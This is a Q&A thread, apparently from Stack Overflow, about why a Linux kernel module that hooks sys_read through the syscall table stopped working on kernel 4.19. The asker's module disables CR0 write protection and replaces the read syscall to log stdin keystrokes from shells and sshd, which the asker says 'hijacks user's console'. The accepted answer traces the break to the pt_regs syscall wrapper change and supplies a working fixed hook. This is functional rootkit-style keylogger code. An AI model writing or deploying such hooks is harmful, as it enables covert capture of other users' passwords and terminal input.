# Memory Isolation in new Linux Kernels, or what?

Tags: c, linux-kernel, kernel-module

This my module perfectly hijacks user's console: https://pastebin.com/99YJFnaq

And it was Linux kernel 4.12, Kali 2018.1.

Now, I've installed the latest version of Kali - 2019.1. It uses kernel 4.19:

> Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1
>   (2019-01-03) x86_64 GNU/Linux

I'm trying to catch anything, but nothing with fd == 0 exists in flow.

---

I've googled for a long long time, tried to read `changelogs` on different resources...

I've found such module `kpti`, which probably would do something like that, but this module is not installed in Kali 2019.1.

Please, help me find the exact reason why `hacked_read` in this piece of code stopped hearing `sys_read()`:

```
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/syscalls.h>
#include <linux/version.h>
#include <linux/unistd.h>

#include <linux/time.h>
#include <linux/preempt.h>

#include <asm/uaccess.h>
#include <asm/paravirt.h>
#include <asm-generic/bug.h>
#include <asm/segment.h>

#define BUFFER_SIZE 512

#define MODULE_NAME "hacked_read"

#define dbg( format, arg... )  do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
#define err( format, arg... )  pr_err(  MODULE_NAME ": " format, ## arg )
#define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
#define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )

MODULE_DESCRIPTION( MODULE_NAME );
MODULE_VERSION( "0.1" );
MODULE_LICENSE( "GPL" );
MODULE_AUTHOR( "module author <mail@domain.com>" );

static char debug_buffer[ BUFFER_SIZE ];
unsigned long ( *original_read ) ( unsigned int, char *, size_t );
void **sct;
unsigned long icounter = 0;

static inline void rw_enable( void ) {
    asm volatile ( "cli \n"
        "pushq %rax \n"
        "movq %cr0, %rax \n"
        "andq $0xfffffffffffeffff, %rax \n"
        "movq %rax, %cr0 \n"
        "popq %rax " );
}

static inline uint64_t getcr0(void) {
    register uint64_t ret = 0;
    asm volatile (
        "movq %%cr0, %0\n"
        :"=r"(ret)
    );
    return ret;
}

static inline void rw_disable( register uint64_t val ) {
    asm volatile(
        "movq %0, %%cr0\n"
        "sti "
        :
        :"r"(val)
    );
}

static void* find_sym( const char *sym ) {
    static unsigned long faddr = 0; // static !!!
    // ----------- nested functions are a GCC extension ---------
    int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {
        if( 0 == strcmp( (char*)data, sym ) ) {
            faddr = addr;
            return 1;
        } else return 0;
    };// --------------------------------------------------------
    kallsyms_on_each_symbol( symb_fn, (void*)sym );
    return (void*)faddr;
}

unsigned long hacked_read_test( unsigned int fd, char *buf, size_t count ) {
    unsigned long r = 1;
    if ( fd != 0 ) { // fd == 0 --> stdin (sh, sshd)
        return original_read( fd, buf, count );
    } else {
        icounter++;
        if ( icounter % 1000 == 0 ) {
            info( "test2 icounter = %ld\n", icounter );
            info( "strlen( debug_buffer ) = %ld\n", strlen( debug_buffer ) );
        }
        r = original_read( fd, buf, count );
        strncat( debug_buffer, buf, 1 );
        if ( strlen( debug_buffer ) > BUFFER_SIZE - 100 )
            debug_buffer[0] = '\0';
        return r;
    }
}

int hacked_read_init( void ) {
    register uint64_t cr0;
    info( "Module was loaded\n" );
    sct = find_sym( "sys_call_table" );
    original_read = (void *)sct[ __NR_read ];
    cr0 = getcr0();
    rw_enable();
    sct[ __NR_read ] = hacked_read_test;
    rw_disable( cr0 );
    return 0;
}

void hacked_read_exit( void ) {
    register uint64_t cr0;
    info( "Module was unloaded\n" );
    cr0 = getcr0();
    rw_enable();
    sct[ __NR_read ] = original_read;
    rw_disable( cr0 );
}

module_init( hacked_read_init );
module_exit( hacked_read_exit );
```

Makefile:

```
CURRENT = $(shell uname -r)
KDIR = /lib/modules/$(CURRENT)/build
PWD = $(shell pwd)

TARGET = hacked_read
obj-m := $(TARGET).o

default:
        $(MAKE) -C $(KDIR) M=$(PWD) modules

clean:
        @rm -f *.o .*.cmd .*.flags *.mod.c *.order
        @rm -f .*.*.cmd *.symvers *~ *.*~ TODO.*
        @rm -fR .tmp*
        @rm -rf .tmp_versions
```

I'm sure that everything like before keeps calling `sys_read()`. `tee`, `bash`, `vi` - all this stuff could not be changed in such short period, but `linux-kernel`.

*I will appreciate the code with bypassing.*

Comment: I'm courious, is there any reason why you are using `kallsyms_on_each_symbol()` instead of [`kallsyms_lookup_name()`](https://elixir.bootlin.com/linux/latest/source/kernel/kallsyms.c#L167)?

Answer (score 4, accepted):

A bit of troubleshooting shows the following:

- Of course, none of userspace programs stopped using `read()`. They still keep calling it.
- There is no "memory isolation". The syscalls table is succesfully modified during the module initialization and the pointer to `sys_read()` is successfully replaced with pointer to `hacked_read_test()`.
- When the module is loaded, the `read()` syscall works as if it was the original one.
- The change in the behavior happened between kernels `4.16` and `4.16.2` (i.e. between **April 1, 2018** and **April 12, 2018**).

Considering this, we have pretty narrow list of commits to check, and the changes are likely to be in the syscalls mechanism. Well, looks like [this commit is what we are looking for](https://github.com/torvalds/linux/commit/fa697140f9a20119a9ec8fd7460cc4314fbdaff3) (and few more around).

The crucial part of this commit is that it changes signatures of the functions defined by `SYSCALL_DEFINEx` so that they accept [a pointer to struct pt_regs](https://github.com/torvalds/linux/commit/fa697140f9a20119a9ec8fd7460cc4314fbdaff3#diff-0a0545e0fc76bb70fbb89f9d4638676eR42) instead of syscall arguments, i.e. `sys_read(unsigned int fd, char __user * buf, size_t count)` becomes `sys_read(const struct pt_regs *regs)`. This means, that `hacked_read_test(unsigned int fd, char *buf, size_t count)` is no longer a valid replacement for `sys_read()`!

So, with new kernels you replace `sys_read(const struct pt_regs *regs)` with `hacked_read_test(unsigned int fd, char *buf, size_t count)`. Why this does not crash and instead works as if it was the original `sys_read()`? Consider the simplified version of `hacked_read_test()` again:

```
unsigned long hacked_read_test( unsigned int fd, char *buf, size_t count ) {
    if ( fd != 0 ) {
        return original_read( fd, buf, count );
    } else {
        // ...
    }
}
```

Well. The first function argument is passed via `%rdi` register. The caller of `sys_read()` places a pointer to `struct pt_regs` into `%rdi` and performs a call. The execution flow goes inside `hacked_read_test()`, and *the first argument, `fd`, is checked for not being zero*. Considering that this argument contains a valid pointer instead of file descriptor, this condition succeeds and the control flow goes directly to `original_read()`, which receives the `fd` value (i.e., actually, the pointer to `struct pt_regs`) as a first argument, which, in turn, then gets successfully used as it was originally meant to be. So, since kernel `4.16.2` your `hacked_read_test()` *effectively* works as follows:

```
unsigned long hacked_read_test( const struct pt_regs *regs ) {
    return original_read( regs );
}
```

To make sure about it, you can try the alternative version of `hacked_read_test()`:

```
unsigned long hacked_read_test( void *ptr ) {    
    if ( ptr != 0 ) {
        info( "invocation of hacked_read_test(): 1st arg is %d (%p)", ptr, ptr );
        return original_read( ptr );
    } else {
        return -EINVAL;
    }
}
```

After compiling and `insmod`ing this version, you get the following:

```
invocation of hacked_read_test(): 1st arg is 35569496 (00000000c3a0dc9e)
```

You may create a working version of `hacked_read_test()`, but it seems that the implementation will be platform-dependent, as you will have to extract the arguments from the appropriate register fields of `regs` (for `x86_84` these are `%rdi`, `%rsi` and `%rdx` for 1st, 2nd and 3rd syscall arguments respectively).

The working `x86_64` implementation is below (tested on kernel `4.19`).

```
#include <asm/ptrace.h>

// ...

unsigned long ( *original_read ) ( const struct pt_regs *regs );

// ...

unsigned long hacked_read_test( const struct pt_regs *regs ) {
    unsigned int fd = regs->di;
    char *buf = (char*) regs->si;
    unsigned long r = 1;
    if ( fd != 0 ) { // fd == 0 --> stdin (sh, sshd)
        return original_read( regs );
    } else {
        icounter++;
        if ( icounter % 1000 == 0 ) {
            info( "test2 icounter = %ld\n", icounter );
            info( "strlen( debug_buffer ) = %ld\n", strlen( debug_buffer ) );
        }
        r = original_read( regs );
        strncat( debug_buffer, buf, 1 );
        if ( strlen( debug_buffer ) > BUFFER_SIZE - 100 )
            debug_buffer[0] = '\0';
        return r;
    }
}
```

Comment: why do you highlight `asm/ptrace.h`?

Comment: `The change in the behavior happened between kernels 4.16 and 4.16.2` - how did you get this? I've compared /boot/configs and have seen this wrapper `ARCH_HAS_SYSCALL_WRAPPER`, and have read that this is part of kernel hardening against excessive payload, because there could be 6 values/registers still, and not all of its used, hacker could pass kind of payload via this free registers to the kernel land. But I could not realize exactly what is happening, because of such big time-gap - 1 year... and skipped reading forward...

Comment: `why do you highlight asm/ptrace.h?` - because `struct pt_regs` is defined there.

Comment: `how did you get this?` - just an experimental binary search (installing different versions of the kernel to a VM and checking the module). It took something around 10 or 11 iterations to find these specific versions.